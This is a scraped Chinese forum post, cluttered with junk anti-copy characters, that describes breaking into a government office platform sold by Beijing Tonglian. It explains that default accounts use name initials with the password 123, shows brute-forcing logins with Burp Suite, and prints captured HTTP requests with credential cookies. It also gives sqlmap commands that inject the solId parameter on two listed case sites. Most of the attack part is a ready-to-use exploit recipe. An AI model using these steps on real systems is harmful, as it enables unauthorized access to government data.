|
3 j4 Y6 g6 u$ J; u1 T
0 I5 f4 O% y- z* T3 o* h
! @' z/ z1 F8 h, v: ^% w0 B2 e! E
3 o& r, J" U- K 平台简介:
3 m# o) X! S* l' N . h8 V( ]9 X; }
/ J; }. P! C5 r, T
2 Q T5 z+ d" G0 [ M/ s: X
# b( c- E4 T) s+ c) \; U/ g4 B! x7 i
& z" @5 [1 o0 l7 p5 c2 x/ Q 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 f' ]2 V$ E6 j. |0 p0 Q. j: z
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* k4 F* _, `# r, a* h同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, Q- y0 C! Z& Z/ j6 a$ G
8 |/ e" E* |) [2 q* j
. I9 _8 \) I6 k* v ! l* B, C5 q9 W
7 ]3 t) B6 `1 D C
. }9 K) I. y" u% S1 |! i% X9 i 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 e. z8 a* P8 [3 ?3 P, L+ [( l
# Y# f7 q# \8 u0 z ~) O
* P; d# A/ l5 h1 B ( [$ V6 T9 T3 v$ S; P
: U. L5 Z4 t* ^; F0 l4 O) f
% U) z+ |: P7 `# A9 P( D5 X http://1.1.1.1:7197/cap-aco/#(案例2-)
: `1 P' t$ w4 t/ o) D! d ! x$ B6 j/ S* W0 K2 A4 k1 U
" G4 @9 k" I7 M4 G& l7 s% t9 Z, ^ http://www.XXOO.com (案例1-官网网站)! f, F& ^, I' n A
4 D! w; ^; o, Q" `, P# t0 B7 `- i+ r9 t! [
9 } l3 a: D& H9 V
2 |. a+ M2 |# ^* ^) o
9 O8 s! g9 e: ]8 Y
漏洞详情:
: U3 X: r* t" C* ^ e / C! J2 n/ s% t. F! K" H; m
" L* Q) D w9 f+ ~ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
$ p: \, Q' r9 l% ^
$ e8 l8 r1 Z$ I7 p: r! @4 V. |1 K% R# k% l
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ k: e$ ?% o/ c3 z# ~
6 o" E p* `' V4 C+ D! l2 K
5 n" ^" K/ _ ]0 i$ e ~
+ v" o+ j% T% [- ?$ x# N ~
6 b+ A, q% D/ g
( ?$ Z) h" K5 ~" y 
4 ~* |1 n* p5 P6 W. L" V2 @% r & d# K2 I& f; E8 @; [& g$ w
, S+ n$ N/ P1 |- K% O
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:6 u, @* B3 j6 X$ R, a
0 H$ z! `; v0 a# |3 C8 J
# h3 l2 _$ l3 q& n/ y 1、案例1-官方网站7 Y! }: U7 m# B, e/ [. T
. P; {0 f$ W/ O5 j$ D L6 t2 f; [) S2 S* x/ D% W6 Q
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 ] h/ I9 z. m" W6 j( g, J
+ U/ @& |8 @$ ]: |$ C" X# K
4 e( T( D: i3 w' |4 F; }9 \3 V2 f" @
Host: www.XXOO.com; s+ f# _7 k* U+ b4 W8 f
9 P; \) a, l% D% i- z' E# q B
/ o3 U- G( `# j% M6 [ Proxy-Connection: Keep-Alive
! i1 l/ C( t9 ~2 K, F, [ ! m+ D6 P% K% D) k. Q( l# E [% X5 Y
5 _ Q# E! C9 r2 o: p. a
Accept: application/json, text/javascript, */*; q=0.013 v6 K( O; N" z3 \: b+ j: L
* D' J- {! }/ L: \
5 X5 m& Y/ q$ G
Accept-Language: zh-CN# S9 A D, O0 E0 g+ b+ d" Q
g! W6 T3 C! \& R6 s
, ~! p- H) X- I6 Z' u# [ Content-Type: application/json
7 s; f, e) x* m- H
7 r. P+ b8 o- x( f( x l4 d1 F
, {1 O ~$ }/ j3 @6 v0 a* G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 c3 }2 ^. }6 Q% g
* h; m' D3 a/ a' M$ o& X9 W* O5 @
X-Requested-With: XMLHttpRequest/ M! |0 h. l+ d# ?9 Z- @4 T" m
0 y9 k2 }( O8 V" B; W
5 Z4 a# [9 M& h) \( n" B: G Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0026 z3 g& _0 ]; M w' [) W* C
( ^4 e0 ?6 Z7 D( w) u/ |
" b. X2 D' M, {* I Accept-Encoding: gzip, deflate, sdch
8 Z, T3 N A" Z, @' |
: v8 x- Y8 d& F- {" Z0 @# J, [7 w+ Z" J5 g- i* F+ k
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
* @. D9 ]: B# X) L: p: @' d 3 {! X% @! i9 ]' P
, i% g# k- q' }$ V: T" L# H 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
0 b# [) n l- i
, {% w' t& g$ Y5 Z7 R4 O$ c# x4 P) v/ F' p' @
 ) U( R, b7 x& D1 U
4 z; g7 S% x, n; w% n* Z z" u5 z
/ Y' b) P( D( L2 D! `2 f
0 V; L. |( o* _6 N
! p8 ^! c1 n1 a) X" v8 ~$ F
9 z; c7 |0 n- P6 {3 D+ G + F. Q- a9 A; _3 T
$ F' z$ [+ h/ z( T6 X# d
8 }5 S- H+ I, m/ @+ ]
0 v* ?" O# N! q* ~
* F0 g+ j9 a6 L
% V2 V, b* V$ T* P/ \ / X' M$ J1 n( W+ w
$ s& ^) |% A8 l3 x, \+ p/ `2 k
* k: z% n" n a! I. g" k" @) b/ h 2、案例2-某天河云平台
9 ~6 g+ s1 K: Q
/ u" D' ~! E1 P# D- I/ _( a
1 B1 p8 T t7 t/ j GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
4 {( [* W+ p( _! A
8 A0 I' N& ]8 }0 C7 O3 [9 l7 A
+ n f7 w* G9 J# ~" L6 e Host: 1.1.1.:7197
3 a& _2 s3 _2 O+ V! I" B $ k; c1 w! p: W3 O
$ m' ]% q1 j1 e Accept: application/json, text/javascript, */*; q=0.019 x' c, h. H% n+ n8 n/ p+ f
4 @: A: p+ [! l# y# s% f0 r* o; t# i. `( t, ~$ q2 G
X-Requested-With: XMLHttpRequest# f1 s+ _0 `( K7 q( z
# b5 p+ d+ w! f/ h
) @9 D1 ]$ W( Z# X& W! |5 [ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
, m$ o X; q1 p/ Y( u
& O$ @7 [ m3 v' {% m+ f$ L: E2 \% r9 o. H5 Y/ ]7 H
Content-Type: application/json
, E# Y( n! _; h H/ g' j# }% J
" {8 ~- m2 K9 ^+ R6 m J6 e
2 {- X( G# _5 K6 t( k+ u! M Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
; `4 z+ o+ @; ^! H! c + s4 g l8 g4 O
+ b: z B3 _' C/ t$ o; M! Y: b u
Accept-Language: zh-CN,zh;q=0.8 L( x# v( s7 _ t% ~0 F5 k
k% x8 x ^# G; A! `1 F q
/ r2 ^% _. E& d( A
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
7 g9 K- h/ x7 k1 Y4 [ 0 z- C7 {# K, i7 L5 c* }
1 d* T+ E. C/ B# o6 W Connection: close. ?0 \1 l2 Q& Z
0 M2 S7 u7 p# s5 g
: w5 ]! H3 }& ?+ E @6 N1 D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
6 W- W3 ]1 I! \9 t- O
/ W. M3 ~# ?9 u1 A' w+ g& U8 O, b: {3 ^- c2 m, ^2 b; l
 # F( d$ e0 A i) T
( x& A2 m( d/ R8 g7 H( U
2 m; u- I" ^: g8 u T
4 ]3 f9 q) Q! R0 ^, V7 Y
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对